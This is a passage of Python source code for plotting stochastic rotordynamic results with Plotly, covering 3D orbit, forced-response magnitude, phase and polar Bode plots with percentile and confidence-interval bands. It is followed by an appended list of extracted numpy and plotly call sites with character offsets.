""" ndof = self.number_dof default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) if fig is None: fig = go.Figure() line = np.zeros(len(self.nodes_pos)) fig.add_trace( go.Scatter3d( x=self.nodes_pos, y=line, z=line, line=dict(width=2.0, color="black", dash="dashdot"), showlegend=False, mode="lines", ) ) for j, n in enumerate(self.nodes_list): x = np.ones(self.yout.shape[1]) * self.nodes_pos[n] fig.add_trace( go.Scatter3d( x=x, y=np.mean(self.yout[..., ndof * n], axis=0), z=np.mean(self.yout[..., ndof * n + 1], axis=0), line=dict(width=5, color="black"), name="Mean", legendgroup="mean", showlegend=True if j == 0 else False, hovertemplate=( "Nodal Position: %{x:.2f}<br>" + "X - Amplitude: %{y:.2e}<br>" + "Y - Amplitude: %{z:.2e}" ), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter3d( x=x, y=np.percentile(self.yout[..., ndof * n], p, axis=0), z=np.percentile(self.yout[..., ndof * n + 1], p, axis=0), opacity=1.0, name="percentile: {}%".format(p), line=dict(width=3, color=colors1[i]), legendgroup="perc{}".format(p), showlegend=True if j == 0 else False, hovertemplate=( "Nodal Position: %{x:.2f}<br>" + "X - Amplitude: %{y:.2e}<br>" + "Y - Amplitude: %{z:.2e}" ), **kwargs, ) ) for i, p in enumerate(conf_interval): fig.add_trace( go.Scatter3d( x=x, y=np.percentile(self.yout[..., ndof * n], 50 + p / 2, axis=0), z=np.percentile( self.yout[..., ndof * n + 1], 50 + p / 2, axis=0 ), line=dict(width=3.5, color=colors1[i]), opacity=0.6, name="confidence interval: {}%".format(p), legendgroup="conf_interval{}".format(p), showlegend=True if j == 0 else False, hovertemplate=( "Nodal Position: %{x:.2f}<br>" + "X - Amplitude: %{y:.2e}<br>" + "Y - Amplitude: %{z:.2e}" ), **kwargs, ) ) fig.add_trace( go.Scatter3d( x=x, y=np.percentile(self.yout[..., ndof * n], 50 - p / 2, axis=0), z=np.percentile( self.yout[..., ndof * n + 1], 50 - p / 2, axis=0 ), line=dict(width=3.5, color=colors1[i]), opacity=0.6, name="confidence interval: {}%".format(p), legendgroup="conf_interval{}".format(p), showlegend=False, hovertemplate=( "Nodal Position: %{x:.2f}<br>" + "X - Amplitude: %{y:.2e}<br>" + "Y - Amplitude: %{z:.2e}" ), **kwargs, ) ) fig.update_layout( scene=dict( xaxis=dict(title=dict(text="<b>Rotor Length</b>"), showspikes=False), yaxis=dict(title=dict(text="<b>Amplitude - X</b>"), showspikes=False), zaxis=dict(title=dict(text="<b>Amplitude - Y</b>"), showspikes=False), ), ) return fig class ST_ForcedResponseResults: """Store stochastic results and provide plots for Forced Response. Parameters ---------- force_resp : array Array with the force response for each node for each frequency. frequency_range : array Array with the frequencies. magnitude : array Magnitude of the frequency response for node for each frequency. phase : array Phase of the frequency response for node for each frequency. number_dof = int Number of degrees of freedom per shaft element's node. Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with amplitude vs frequency phase angle vs frequency. """ def __init__(self, forced_resp, magnitude, phase, frequency_range, number_dof): self.forced_resp = forced_resp self.magnitude = magnitude self.phase = phase self.frequency_range = frequency_range self.number_dof = number_dof def plot_magnitude( self, probe, percentile=[], conf_interval=[], fig=None, units="mic-pk-pk", **kwargs, ): """Plot frequency response. 
This method plots the unbalance response magnitude. Parameters ---------- probe : list of tuples List with tuples (node, orientation angle). node : int indicate the node where the probe is located. orientation : float, probe orientation angle about the shaft. The 0 refers to +X direction. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0% and 100% inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. units : str, optional Unit system Default is "mic-pk-pk". kwargs : optional Additional key word arguments can be passed to change the plot layout (e.g. width=800, height=600, ...). *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() Bokeh plot axes with magnitude plot. """ if units == "m": y_axis_label = "<b>Amplitude (m)</b>" elif units == "mic-pk-pk": y_axis_label = "<b>Amplitude (μ pk-pk)</b>" else: y_axis_label = "<b>Amplitude (dB)</b>" conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) if fig is None: fig = go.Figure() color_i = 0 color_p = 0 for i, p in enumerate(probe): dofx = p[0] * self.number_dof dofy = p[0] * self.number_dof + 1 angle = p[1] # fmt: off operator = np.array( [[np.cos(angle), - np.sin(angle)], [np.cos(angle), + np.sin(angle)]] ) probe_resp = np.zeros_like(self.magnitude[:, :, 0]) for j, mag in enumerate(self.magnitude): _probe_resp = operator @ np.vstack((mag[:, dofx], mag[:, dofy])) probe_resp[i] = np.sqrt((_probe_resp[0] * np.cos(angle)) ** 2 + (_probe_resp[1] * np.sin(angle)) ** 2) # fmt: on fig.add_trace( go.Scatter( x=self.frequency_range, y=np.mean(probe_resp, axis=0), opacity=1.0, mode="lines", line=dict(width=3, color=list(tableau_colors)[i]), name=f"Probe {i + 1} - Mean", legendgroup=f"Probe {i + 1} - Mean", hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}", ) ) for j, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.frequency_range, y=np.percentile(probe_resp, p, axis=0), opacity=0.6, mode="lines", line=dict(width=2.5, color=colors1[color_p]), name=f"Probe {i + 1} - percentile: {p}%", legendgroup=f"Probe {i + 1} - percentile: {p}%", hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}", ) ) color_p += 1 x = np.concatenate((self.frequency_range, self.frequency_range[::-1])) for j, p in enumerate(conf_interval): p1 = np.percentile(probe_resp, 50 + p / 2, axis=0) p2 = np.percentile(probe_resp, 50 - p / 2, axis=0) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), mode="lines", line=dict(width=1, color=colors2[color_i]), fill="toself", fillcolor=colors2[color_i], opacity=0.5, name=f"Probe {i + 1} - confidence interval: {p}%", legendgroup=f"Probe {i + 1} - confidence interval: {p}%", hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}", ) ) color_i += 1 fig.update_xaxes(title_text="<b>Frequency</b>") fig.update_yaxes(title_text=y_axis_label) fig.update_layout(**kwargs) return fig def plot_phase(self, probe, percentile=[], conf_interval=[], fig=None, **kwargs): """Plot frequency response. This method plots the phase response given a set of probes. Parameters ---------- probe : list of tuples List with tuples (node, orientation angle). node : int indicate the node where the probe is located. orientation : float, probe orientation angle about the shaft. The 0 refers to +X direction. 
percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. kwargs : optional Additional key word arguments can be passed to change the plot layout (e.g. width=800, height=600, ...). *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) if fig is None: fig = go.Figure() color_p = 0 color_i = 0 for i, p in enumerate(probe): probe_phase = np.zeros_like(self.phase[:, :, 0]) for j, phs in enumerate(self.phase): aux_phase = phs[:, p[0] * self.number_dof] probe_phase[i] = np.array( [i + 2 * np.pi if i < 0 else i for i in aux_phase] ) angle = p[1] probe_phase[i] = probe_phase[i] - angle fig.add_trace( go.Scatter( x=self.frequency_range, y=np.mean(probe_phase, axis=0), opacity=1.0, mode="lines", line=dict(width=3, color=list(tableau_colors)[i]), name=f"Probe {i + 1} - Mean", legendgroup=f"Probe {i + 1} - Mean", hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}", ) ) for j, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.frequency_range, y=np.percentile(probe_phase, p, axis=0), opacity=0.6, mode="lines", line=dict(width=2.5, color=colors1[color_p]), name=f"Probe {i + 1} - percentile: {p}%", legendgroup=f"Probe {i + 1} - percentile: {p}%", hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}", ) ) color_p += 1 x = np.concatenate((self.frequency_range, self.frequency_range[::-1])) for j, p in enumerate(conf_interval): p1 = np.percentile(probe_phase, 50 + p / 2, axis=0) p2 = np.percentile(probe_phase, 50 - p / 2, axis=0) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), mode="lines", line=dict(width=1, color=colors2[color_i]), fill="toself", fillcolor=colors2[color_i], opacity=0.5, name=f"Probe {i + 1} - confidence interval: {p}%", legendgroup=f"Probe {i + 1} - confidence interval: {p}%", hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}", ) ) color_i += 1 fig.update_xaxes(title_text="<b>Frequency</b>") fig.update_yaxes(title_text="<b>Phase Angle</b>") fig.update_layout(**kwargs), return fig def plot_polar_bode( self, probe, percentile=[], conf_interval=[], fig=None, units="mic-pk-pk", **kwargs, ): """Plot polar forced response using Plotly. Parameters ---------- probe : list of tuples List with tuples (node, orientation angle). node : int indicate the node where the probe is located. orientation : float, probe orientation angle about the shaft. The 0 refers to +X direction. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. units : str Magnitude unit system. Default is "mic-pk-pk" polar_kwargs : optional Additional key word arguments can be passed to change the plot layout only (e.g. width=1000, height=800, ...). *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. 
""" conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) if units == "m": r_axis_label = "<b>Amplitude (m)</b>" elif units == "mic-pk-pk": r_axis_label = "<b>Amplitude (μ pk-pk)</b>" else: r_axis_label = "<b>Amplitude (dB)</b>" if fig is None: fig = go.Figure() color_p = 0 color_i = 0 for i, p in enumerate(probe): dofx = p[0] * self.number_dof dofy = p[0] * self.number_dof + 1 angle = p[1] # fmt: off operator = np.array( [[np.cos(angle), - np.sin(angle)], [np.cos(angle), + np.sin(angle)]] ) probe_resp = np.zeros_like(self.magnitude[:, :, 0]) for j, mag in enumerate(self.magnitude): _probe_resp = operator @ np.vstack((mag[:, dofx], mag[:, dofy])) probe_resp[i] = np.sqrt((_probe_resp[0] * np.cos(angle)) ** 2 + (_probe_resp[1] * np.sin(angle)) ** 2) # fmt: on probe_phase = np.zeros_like(self.phase[:, :, 0]) for j, phs in enumerate(self.phase): aux_phase = phs[:, p[0] * self.number_dof] probe_phase[i] = np.array( [i + 2 * np.pi if i < 0 else i for i in aux_phase] ) angle = p[1] probe_phase[i] = probe_phase[i] - angle fig.add_trace( go.Scatterpolar( r=np.mean(probe_resp, axis=0), theta=np.mean(probe_phase, axis=0), customdata=self.frequency_range, thetaunit="radians", mode="lines", line=dict(width=3.0, color=list(tableau_colors)[i]), name=f"Probe {i + 1} - Mean", legendgroup=f"Probe {i + 1} - Mean", hovertemplate=( "<b>Amplitude: %{r:.2e}</b><br>" + "<b>Phase: %{theta:.2f}</b><br>" + "<b>Frequency: %{customdata:.2f}</b>" ), ) ) for j, p in enumerate(percentile): fig.add_trace( go.Scatterpolar( r=np.percentile(probe_resp, p, axis=0), theta=np.percentile(probe_phase, p, axis=0), customdata=self.frequency_range, thetaunit="radians", opacity=0.6, line=dict(width=2.5, color=colors1[color_p]), name=f"Probe {i + 1} - percentile: {p}%", legendgroup=f"Probe {i + 1} - percentile{p}", hovertemplate=( "<b>Amplitude: %{r:.2e}</b><br>" + "<b>Phase: %{theta:.2f}</b><br>" + "<b>Frequency: %{customdata:.2f}</b>" ), ) ) color_p += 1 for j, p in enumerate(conf_interval): p1 = np.percentile(probe_resp, 50 + p / 2, axis=0) p2 = np.percentile(probe_resp, 50 - p / 2, axis=0) p3 = np.percentile(probe_phase, 50 + p / 2, axis=0) p4 = np.percentile(probe_phase, 50 - p / 2, axis=0) fig.add_trace( go.Scatterpolar( r=np.concatenate((p1, p2[::-1])), theta=np.concatenate((p3, p4[::-1])), thetaunit="radians", line=dict(width=1, color=colors2[color_i]), fill="toself", fillcolor=colors2[color_i], opacity=0.5, name=f"Probe {i + 1} - confidence interval: {p}%", legendgroup=f"Probe {i + 1} - confidence interval: {p}%", ) ) color_i += 1 fig.update_layout( polar=dict( radialaxis=dict(title_text=r_axis_label, exponentformat="E"), angularaxis=dict(exponentformat="E"), ), **kwargs, ) return fig def plot( self, probe, percentile=[], conf_interval=[], fig=None, units="mic-pk-pk", **kwargs, ): """Plot frequency response. This method plots the frequency and phase response given a set of probes. Parameters ---------- dof : int Degree of freedom to observe the response. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. units : str, optional Unit system Default is "mic-pk-pk" kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. 
Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with amplitude vs frequency phase angle vs frequency. """ # fmt: off fig0 = self.plot_magnitude(probe, percentile, conf_interval, units=units, **kwargs) fig1 = self.plot_phase(probe, percentile, conf_interval, **kwargs) fig2 = self.plot_polar_bode(probe, percentile, conf_interval, units=units, **kwargs) if fig is None: fig = make_subplots( rows=2, cols=2, specs=[[{}, {"type": "polar", "rowspan": 2}], [{}, None]] ) # fmt: on for data in fig0["data"]: data.showlegend = False fig.add_trace(data, row=1, col=1) for data in fig1["data"]: data.showlegend = False fig.add_trace(data, row=2, col=1) for data in fig2["data"]: fig.add_trace(data, row=1, col=2) fig.update_xaxes(fig0.layout.xaxis, row=1, col=1) fig.update_yaxes(fig0.layout.yaxis, row=1, col=1) fig.update_xaxes(fig1.layout.xaxis, row=2, col=1) fig.update_yaxes(fig1.layout.yaxis, row=2, col=1) fig.update_layout( polar=dict( radialaxis=fig2.layout.polar.radialaxis, angularaxis=fig2.layout.polar.angularaxis, ), ) return fig
[((2441, 2463), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (2448, 2463), True, 'import numpy as np\n'), ((2485, 2504), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (2492, 2504), True, 'import numpy as np\n'), ((2601, 2612), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (2610, 2612), True, 'from plotly import graph_objects as go\n'), ((2625, 2683), 'numpy.concatenate', 'np.concatenate', (['(self.speed_range, self.speed_range[::-1])'], {}), '((self.speed_range, self.speed_range[::-1]))\n', (2639, 2683), True, 'import numpy as np\n'), ((7324, 7346), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (7331, 7346), True, 'import numpy as np\n'), ((7368, 7387), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (7375, 7387), True, 'import numpy as np\n'), ((7484, 7495), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (7493, 7495), True, 'from plotly import graph_objects as go\n'), ((7508, 7566), 'numpy.concatenate', 'np.concatenate', (['(self.speed_range, self.speed_range[::-1])'], {}), '((self.speed_range, self.speed_range[::-1]))\n', (7522, 7566), True, 'import numpy as np\n'), ((11809, 11838), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(1)', 'cols': '(2)'}), '(rows=1, cols=2)\n', (11822, 11838), False, 'from plotly.subplots import make_subplots\n'), ((14773, 14795), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (14780, 14795), True, 'import numpy as np\n'), ((14817, 14836), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (14824, 14836), True, 'import numpy as np\n'), ((14933, 14944), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (14942, 14944), True, 'from plotly import graph_objects as go\n'), ((15927, 15985), 'numpy.concatenate', 'np.concatenate', (['(self.speed_range, self.speed_range[::-1])'], {}), '((self.speed_range, self.speed_range[::-1]))\n', (15941, 15985), True, 'import numpy as np\n'), ((18675, 18697), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (18682, 18697), True, 'import numpy as np\n'), ((18719, 18738), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (18726, 18738), True, 'import numpy as np\n'), ((18835, 18846), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (18844, 18846), True, 'from plotly import graph_objects as go\n'), ((19813, 19871), 'numpy.concatenate', 'np.concatenate', (['(self.speed_range, self.speed_range[::-1])'], {}), '((self.speed_range, self.speed_range[::-1]))\n', (19827, 19871), True, 'import numpy as np\n'), ((22384, 22406), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (22391, 22406), True, 'import numpy as np\n'), ((22428, 22447), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (22435, 22447), True, 'import numpy as np\n'), ((22776, 22787), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (22785, 22787), True, 'from plotly import graph_objects as go\n'), ((27101, 27193), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(2)', 'cols': '(2)', 'specs': "[[{}, {'type': 'polar', 'rowspan': 2}], [{}, None]]"}), "(rows=2, cols=2, specs=[[{}, {'type': 'polar', 'rowspan': 2}],\n [{}, None]])\n", (27114, 27193), False, 'from plotly.subplots import make_subplots\n'), ((30689, 30711), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (30696, 30711), True, 'import numpy as np\n'), ((30733, 30752), 'numpy.sort', 'np.sort', 
(['percentile'], {}), '(percentile)\n', (30740, 30752), True, 'import numpy as np\n'), ((34671, 34693), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (34678, 34693), True, 'import numpy as np\n'), ((34715, 34734), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (34722, 34734), True, 'import numpy as np\n'), ((38288, 38310), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (38295, 38310), True, 'import numpy as np\n'), ((38332, 38351), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (38339, 38351), True, 'import numpy as np\n'), ((45455, 45477), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (45462, 45477), True, 'import numpy as np\n'), ((45499, 45518), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (45506, 45518), True, 'import numpy as np\n'), ((49896, 49918), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (49903, 49918), True, 'import numpy as np\n'), ((49940, 49959), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (49947, 49959), True, 'import numpy as np\n'), ((54194, 54216), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (54201, 54216), True, 'import numpy as np\n'), ((54238, 54257), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (54245, 54257), True, 'import numpy as np\n'), ((16049, 16098), 'numpy.percentile', 'np.percentile', (['self.magnitude', '(50 + p / 2)'], {'axis': '(1)'}), '(self.magnitude, 50 + p / 2, axis=1)\n', (16062, 16098), True, 'import numpy as np\n'), ((16116, 16165), 'numpy.percentile', 'np.percentile', (['self.magnitude', '(50 - p / 2)'], {'axis': '(1)'}), '(self.magnitude, 50 - p / 2, axis=1)\n', (16129, 16165), True, 'import numpy as np\n'), ((19935, 19980), 'numpy.percentile', 'np.percentile', (['self.phase', '(50 + p / 2)'], {'axis': '(1)'}), '(self.phase, 50 + p / 2, axis=1)\n', (19948, 19980), True, 'import numpy as np\n'), ((19998, 20043), 'numpy.percentile', 'np.percentile', (['self.phase', '(50 - p / 2)'], {'axis': '(1)'}), '(self.phase, 50 - p / 2, axis=1)\n', (20011, 20043), True, 'import numpy as np\n'), ((24302, 24351), 'numpy.percentile', 'np.percentile', (['self.magnitude', '(50 + p / 2)'], {'axis': '(1)'}), '(self.magnitude, 50 + p / 2, axis=1)\n', (24315, 24351), True, 'import numpy as np\n'), ((24369, 24418), 'numpy.percentile', 'np.percentile', (['self.magnitude', '(50 - p / 2)'], {'axis': '(1)'}), '(self.magnitude, 50 - p / 2, axis=1)\n', (24382, 24418), True, 'import numpy as np\n'), ((24436, 24481), 'numpy.percentile', 'np.percentile', (['self.phase', '(50 + p / 2)'], {'axis': '(1)'}), '(self.phase, 50 + p / 2, axis=1)\n', (24449, 24481), True, 'import numpy as np\n'), ((24499, 24544), 'numpy.percentile', 'np.percentile', (['self.phase', '(50 - p / 2)'], {'axis': '(1)'}), '(self.phase, 50 - p / 2, axis=1)\n', (24512, 24544), True, 'import numpy as np\n'), ((30608, 30619), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (30617, 30619), True, 'from plotly import graph_objects as go\n'), ((31185, 31220), 'numpy.zeros_like', 'np.zeros_like', (['self.yout[:, :, (0)]'], {}), '(self.yout[:, :, (0)])\n', (31198, 31220), True, 'import numpy as np\n'), ((32488, 32544), 'numpy.concatenate', 'np.concatenate', (['(self.time_range, self.time_range[::-1])'], {}), '((self.time_range, self.time_range[::-1]))\n', (32502, 32544), True, 'import numpy as np\n'), ((34859, 34870), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', 
(34868, 34870), True, 'from plotly import graph_objects as go\n'), ((36009, 36071), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node]', '(50 + p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * node], 50 + p / 2, axis=0)\n', (36022, 36071), True, 'import numpy as np\n'), ((36089, 36151), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node]', '(50 - p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * node], 50 - p / 2, axis=0)\n', (36102, 36151), True, 'import numpy as np\n'), ((36169, 36235), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node + 1]', '(50 + p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * node + 1], 50 + p / 2, axis=0)\n', (36182, 36235), True, 'import numpy as np\n'), ((36253, 36319), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node + 1]', '(50 - p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * node + 1], 50 - p / 2, axis=0)\n', (36266, 36319), True, 'import numpy as np\n'), ((38476, 38487), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (38485, 38487), True, 'from plotly import graph_objects as go\n'), ((45562, 45573), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (45571, 45573), True, 'from plotly import graph_objects as go\n'), ((45965, 46005), 'numpy.zeros_like', 'np.zeros_like', (['self.magnitude[:, :, (0)]'], {}), '(self.magnitude[:, :, (0)])\n', (45978, 46005), True, 'import numpy as np\n'), ((47503, 47569), 'numpy.concatenate', 'np.concatenate', (['(self.frequency_range, self.frequency_range[::-1])'], {}), '((self.frequency_range, self.frequency_range[::-1]))\n', (47517, 47569), True, 'import numpy as np\n'), ((50003, 50014), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (50012, 50014), True, 'from plotly import graph_objects as go\n'), ((50120, 50156), 'numpy.zeros_like', 'np.zeros_like', (['self.phase[:, :, (0)]'], {}), '(self.phase[:, :, (0)])\n', (50133, 50156), True, 'import numpy as np\n'), ((51658, 51724), 'numpy.concatenate', 'np.concatenate', (['(self.frequency_range, self.frequency_range[::-1])'], {}), '((self.frequency_range, self.frequency_range[::-1]))\n', (51672, 51724), True, 'import numpy as np\n'), ((54533, 54544), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (54542, 54544), True, 'from plotly import graph_objects as go\n'), ((54936, 54976), 'numpy.zeros_like', 'np.zeros_like', (['self.magnitude[:, :, (0)]'], {}), '(self.magnitude[:, :, (0)])\n', (54949, 54976), True, 'import numpy as np\n'), ((55317, 55353), 'numpy.zeros_like', 'np.zeros_like', (['self.phase[:, :, (0)]'], {}), '(self.phase[:, :, (0)])\n', (55330, 55353), True, 'import numpy as np\n'), ((60096, 60188), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(2)', 'cols': '(2)', 'specs': "[[{}, {'type': 'polar', 'rowspan': 2}], [{}, None]]"}), "(rows=2, cols=2, specs=[[{}, {'type': 'polar', 'rowspan': 2}],\n [{}, None]])\n", (60109, 60188), False, 'from plotly.subplots import make_subplots\n'), ((4495, 4540), 'numpy.percentile', 'np.percentile', (['self.wd[j]', '(50 + p / 2)'], {'axis': '(1)'}), '(self.wd[j], 50 + p / 2, axis=1)\n', (4508, 4540), True, 'import numpy as np\n'), ((4562, 4607), 'numpy.percentile', 'np.percentile', (['self.wd[j]', '(50 - p / 2)'], {'axis': '(1)'}), '(self.wd[j], 50 - p / 2, axis=1)\n', (4575, 4607), True, 'import numpy as np\n'), ((8751, 8801), 'numpy.percentile', 'np.percentile', (['self.log_dec[j]', '(50 + p / 2)'], {'axis': '(1)'}), '(self.log_dec[j], 50 + p / 2, axis=1)\n', (8764, 8801), True, 'import 
numpy as np\n'), ((8823, 8873), 'numpy.percentile', 'np.percentile', (['self.log_dec[j]', '(50 - p / 2)'], {'axis': '(1)'}), '(self.log_dec[j], 50 - p / 2, axis=1)\n', (8836, 8873), True, 'import numpy as np\n'), ((32616, 32661), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 + p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 + p / 2, axis=0)\n', (32629, 32661), True, 'import numpy as np\n'), ((32683, 32728), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 - p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 - p / 2, axis=0)\n', (32696, 32728), True, 'import numpy as np\n'), ((38886, 38913), 'numpy.ones', 'np.ones', (['self.yout.shape[1]'], {}), '(self.yout.shape[1])\n', (38893, 38913), True, 'import numpy as np\n'), ((47641, 47686), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 + p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 + p / 2, axis=0)\n', (47654, 47686), True, 'import numpy as np\n'), ((47708, 47753), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 - p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 - p / 2, axis=0)\n', (47721, 47753), True, 'import numpy as np\n'), ((50296, 50358), 'numpy.array', 'np.array', (['[(i + 2 * np.pi if i < 0 else i) for i in aux_phase]'], {}), '([(i + 2 * np.pi if i < 0 else i) for i in aux_phase])\n', (50304, 50358), True, 'import numpy as np\n'), ((51796, 51842), 'numpy.percentile', 'np.percentile', (['probe_phase', '(50 + p / 2)'], {'axis': '(0)'}), '(probe_phase, 50 + p / 2, axis=0)\n', (51809, 51842), True, 'import numpy as np\n'), ((51864, 51910), 'numpy.percentile', 'np.percentile', (['probe_phase', '(50 - p / 2)'], {'axis': '(0)'}), '(probe_phase, 50 - p / 2, axis=0)\n', (51877, 51910), True, 'import numpy as np\n'), ((55493, 55555), 'numpy.array', 'np.array', (['[(i + 2 * np.pi if i < 0 else i) for i in aux_phase]'], {}), '([(i + 2 * np.pi if i < 0 else i) for i in aux_phase])\n', (55501, 55555), True, 'import numpy as np\n'), ((57417, 57462), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 + p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 + p / 2, axis=0)\n', (57430, 57462), True, 'import numpy as np\n'), ((57484, 57529), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 - p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 - p / 2, axis=0)\n', (57497, 57529), True, 'import numpy as np\n'), ((57551, 57597), 'numpy.percentile', 'np.percentile', (['probe_phase', '(50 + p / 2)'], {'axis': '(0)'}), '(probe_phase, 50 + p / 2, axis=0)\n', (57564, 57597), True, 'import numpy as np\n'), ((57619, 57665), 'numpy.percentile', 'np.percentile', (['probe_phase', '(50 - p / 2)'], {'axis': '(0)'}), '(probe_phase, 50 - p / 2, axis=0)\n', (57632, 57665), True, 'import numpy as np\n'), ((15047, 15078), 'numpy.mean', 'np.mean', (['self.magnitude'], {'axis': '(1)'}), '(self.magnitude, axis=1)\n', (15054, 15078), True, 'import numpy as np\n'), ((18949, 18976), 'numpy.mean', 'np.mean', (['self.phase'], {'axis': '(1)'}), '(self.phase, axis=1)\n', (18956, 18976), True, 'import numpy as np\n'), ((22859, 22890), 'numpy.mean', 'np.mean', (['self.magnitude'], {'axis': '(1)'}), '(self.magnitude, axis=1)\n', (22866, 22890), True, 'import numpy as np\n'), ((22914, 22941), 'numpy.mean', 'np.mean', (['self.phase'], {'axis': '(1)'}), '(self.phase, axis=1)\n', (22921, 22941), True, 'import numpy as np\n'), ((31306, 31345), 'numpy.vstack', 'np.vstack', (['(y[:, (dofx)], y[:, (dofy)])'], {}), '((y[:, (dofx)], y[:, (dofy)]))\n', (31315, 31345), True, 'import numpy as np\n'), ((34937, 34981), 'numpy.mean', 'np.mean', (['self.yout[..., ndof * 
